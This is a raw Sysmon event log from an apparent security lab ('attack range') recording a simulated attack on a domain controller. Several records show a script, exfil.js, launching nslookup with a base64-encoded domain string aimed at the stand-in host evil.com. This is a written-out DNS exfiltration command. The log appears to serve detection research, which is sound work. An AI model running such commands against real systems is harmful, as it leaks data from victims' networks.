14:16:07.019{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.019{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000194445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.019{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmgr.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043910Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:08.620{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=065BEEB5B4EAAF3C62F02B6227B81558,SHA256=99005F2FB0C0DA63C111338CB38A266D6C5CC141D9D6D3DE3BDCB91C42773FF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.985{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbqzbp.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.985{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33A3D8595F185F2F0A4BF11CDF05E2D8,SHA256=FBAD38FEF4D44C6113ED9489A2971F47F6D8CE696BC584AFB66FD41D752E187F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.953{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3942B73A47AE7590F18F4CC806ECF12,SHA256=F069956C6D37EA2E3A243C6AABDCBE924C756B185BD9F58F93CE118CEF2DC175,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.938{2E1864BB-17A8-629A-0D3E-000000005F02}67125100C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-0E3E-000000005F02}7528C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.938{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.938{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.938{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.938{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.938{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-0E3E-000000005F02}7528C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.938{2E1864BB-17A8-629A-0C3E-000000005F02}80486656C:\Windows\system32\cmd.exe{2E1864BB-17A8-629A-0E3E-000000005F02}7528C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.948{2E1864BB-17A8-629A-0E3E-000000005F02}7528C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A8-629A-0C3E-000000005F02}8048C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbqzbp.tmp 2>&1 10341000x8000000000000000194933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.923{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-0D3E-000000005F02}6712C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.923{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A8-629A-0D3E-000000005F02}6712C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.906{2E1864BB-17A8-629A-0D3E-000000005F02}67125100C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-0C3E-000000005F02}8048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.906{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-0D3E-000000005F02}6712C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.904{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.904{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.904{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.904{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.903{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-0C3E-000000005F02}8048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.903{2E1864BB-17A1-629A-783D-000000005F02}55526176C:\Windows\System32\WScript.exe{2E1864BB-17A8-629A-0C3E-000000005F02}8048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.903{2E1864BB-17A8-629A-0C3E-000000005F02}8048C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbqzbp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000194922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.366{00000000-0000-0000-0000-000000000000}2060<unknown process>-udptruefalse127.0.0.1-52134-false127.0.0.1-53domain 23542300x8000000000000000194921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.885{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsajvz.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.853{2E1864BB-17A8-629A-0A3E-000000005F02}36206504C:\Windows\system32\conhost.exe{2E1864BB-17A8-629A-0B3E-000000005F02}8040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.853{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.853{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.853{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A8-629A-0B3E-000000005F02}8040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:08.853{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 